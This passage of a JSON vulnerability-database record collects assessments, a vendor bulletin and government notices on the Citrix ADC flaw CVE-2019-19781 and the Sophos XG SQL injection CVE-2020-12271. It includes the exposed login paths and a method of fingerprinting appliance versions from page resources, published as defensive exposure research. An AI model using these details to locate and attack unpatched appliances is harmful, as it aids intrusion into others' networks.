AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**bcook-r7** at January 11, 2020 7:23pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**hrbrmstr** at May 12, 2020 7:56pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**gwillcox-r7** at October 20, 2020 5:51pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-07-27T00:00:00", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-15T14:58:59", "description": "A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords)\n\n \n**Recent assessments:** \n \n**hrbrmstr** at April 27, 2020 12:34pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\n**busterb** at April 29, 2020 1:24pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-12271"], "modified": "2021-03-29T00:00:00", "id": "AKB:75221F03-CFA1-478E-9777-568E523E3272", "href": "https://attackerkb.com/topics/CkJJPr77qk/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "citrix": [{"lastseen": "2022-07-05T16:55:35", "description": "## Description of Problem\n\nA vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.\n\nThe scope of this vulnerability includes Citrix ADC and Citrix Gateway Virtual Appliances (VPX) hosted on any of Citrix Hypervisor (formerly XenServer), ESX, Hyper-V, KVM, Azure, AWS, GCP, Citrix ADC MPX or Citrix ADC SDX.\n\nFurther investigation by Citrix has shown that this issue also affects certain deployments of Citrix SD-WAN, specifically Citrix SD-WAN WANOP edition. Citrix SD-WAN WANOP edition packages Citrix ADC as a load balancer thus resulting in the affected status.\n\nThe vulnerability has been assigned the following CVE number:\n\n\u2022 CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP appliance leading to arbitrary code execution\n\nThe vulnerability affects the following supported product versions on all supported platforms:\n\n\u2022 Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24\n\n\u2022 NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18\n\n\u2022 NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13\n\n\u2022 NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15\n\n\u2022 NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12\n\n\u2022 Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n* * *\n\n## What Customers Should Do\n\nExploits of this issue on unmitigated appliances have been observed in the wild. Citrix strongly urges affected customers to immediately upgrade to a fixed build OR apply the provided mitigation which applies equally to Citrix ADC, Citrix Gateway and Citrix SD-WAN WANOP deployments. Customers who have chosen to immediately apply the mitigation should then upgrade all of their vulnerable appliances to a fixed build of the appliance at their earliest schedule. Subscribe to bulletin alerts at <https://support.citrix.com/user/alerts> to be notified when the new fixes are available.\n\nThe following knowledge base article contains the steps to deploy a responder policy to mitigate the issue in the interim until the system has been updated to a fixed build: [CTX267679 - Mitigation steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>)\n\nThe following knowledge base article contains the steps to deploy a responder policy to mitigate the issue in the interim until a permanent fix is available: [CTX267679 - Mitigation steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>)\n\nUpon application of the mitigation steps, customers may then verify correctness using the tool published here: [CTX269180 - CVE-2019-19781 \u2013 Verification Tool](<https://support.citrix.com/article/CTX269180>)\n\n_In Citrix ADC and Citrix Gateway Release \"12.1 build 50.28\", an issue exists that affects responder and rewrite policies causing them not to process the packets that matched policy rules. This issue was resolved in \"12.1 build 50.28/31\" after which the mitigation steps, if applied, will be effective. However, Citrix recommends that customers using these builds now update to \"12.1 build 55.18\", or later, where CVE-2019-19781 issue is already addressed._\n\n_Customers on \"12.1 build 50.28\" who wish to defer updating to \"12.1 build 55.18\" or later should choose one from the following two options for the mitigation steps to function as intended:_\n\n_1\\. Update to the refreshed \"12.1 build 50.28/50.31\" or later and apply the mitigation steps, OR \n_\n\n_2\\. Apply the mitigation steps towards protecting the management interface as published in CTX267679. This will mitigate attacks, not just on the management interface but on ALL interfaces including Gateway and AAA virtual IPs_\n\n**Fixed builds have been released across all supported versions of Citrix ADC and Citrix Gateway. Fixed builds have also been released for Citrix SD-WAN WANOP for the applicable appliance models. Citrix strongly recommends that customers install these updates at their earliest schedule. The fixed builds can be downloaded from <https://www.citrix.com/downloads/citrix-adc/> and <https://www.citrix.com/downloads/citrix-gateway/> and <https://www.citrix.com/downloads/citrix-sd-wan/>**\n\n** [](<https://www.citrix.com/downloads/citrix-sd-wan/>)** \nCustomers who have upgraded to fixed builds do not need to retain the mitigation described in CTX267679.\n\n* * *\n\n## Fix Timelines\n\nCitrix has released fixes in the form of refresh builds across all supported versions of Citrix ADC, Citrix Gateway, and applicable appliance models of Citrix SD-WAN WANOP. Please refer to the table below for the release dates.\n\nCitrix ADC and Citrix Gateway \n--- \nVersion | Refresh Build | Release Date \n10.5 | 10.5.70.12 | 24th January 2020 (Released) \n11.1 | 11.1.63.15 | 19th January 2020 (Released) \n12.0 | 12.0.63.13 | 19th January 2020 (Released) \n12.1 | 12.1.55.18 | 23rd January 2020 (Released) \n13.0 | 13.0.47.24 | 23rd January 2020 (Released) \nCitrix SD-WAN WANOP \nRelease | Citrix ADC Release | Release Date \n10.2.6b | 11.1.51.615 | 22nd January 2020 (Released) \n11.0.3b | 11.1.51.615 | 22nd January 2020 (Released) \n \n* * *\n\n## Acknowledgements\n\nCitrix thanks Mikhail Klyuchnikov of Positive Technologies, and Gianlorenzo Cipparrone and Miguel Gonzalez of Paddy Power Betfair plc for working with us to protect Citrix customers.\n\n* * *\n\n## What Citrix Is Doing\n\nCitrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at _ <http://support.citrix.com/>_.\n\n* * *\n\n## Obtaining Support on This Issue\n\nIf you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at _ <https://www.citrix.com/support/open-a-support-case.html>_. \n\n* * *\n\n## Reporting Security Vulnerabilities\n\nCitrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 [Reporting Security Issues to Citrix](<http://support.citrix.com/article/CTX081743>)\n\n* * *\n\n## Changelog\n\nDate | Change \n---|--- \n17th December 2019 | Initial Publication \n11th January 2020 | Fix Timelines Updated \n16th January 2020 | SD-WAN WANOP added/Citrix ADC 12.1 responder bug detail added \n16th January 2020 | CVE verification tool \n17th January 2020 | Update to Citrix ADC and Citrix Gateway 12.1 responder policy issue \n19th January 2020 | Announced release of 12.0 and 11.1 builds. Announced earlier release dates for other versions. \n22nd January 2020 | Announced fixes for SD-WAN WANOP appliances \n23rd January 2020 | Announced (accelerated) release of 13.0 and 12.1 builds. \n24th January 2020 | Announced release of 10.5 build \n23rd October 2020 | Added explicit statement clarifying that MPX is affected \n \n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-17T05:00:00", "type": "citrix", "title": "CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-10-23T04:00:00", "id": "CTX267027", "href": "https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:54", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released a [utility](<https://github.com/cisagov/check-cve-2019-19781>) that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. According to Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>), beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.\n\nCISA strongly advises affected organizations to review CERT/CC\u2019s Vulnerability Note [VU#619785](<https://www.kb.cert.org/vuls/id/619785/>) and Citrix Security Bulletin [CTX267027 ](<https://support.citrix.com/article/CTX267027>)and apply the mitigations until Citrix releases new versions of the software.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "cisa", "title": "CISA Releases Test for Citrix ADC and Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "CISA:661993843C9F9A838ADA8B8B8B9412D1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:50", "description": "Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the necessary updates. CISA also recommends users and administrators:\n\n * Run the [Indicators of Compromise Scanner](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>);\n * Review the Citrix article on [CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>), published January 23, 2020; and\n * Review CISA\u2019s Activity Alert on [Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://www.us-cert.gov/ncas/alerts/aa20-020a>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T00:00:00", "type": "cisa", "title": "Citrix Releases Security Updates for SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-23T00:00:00", "id": "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:51", "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 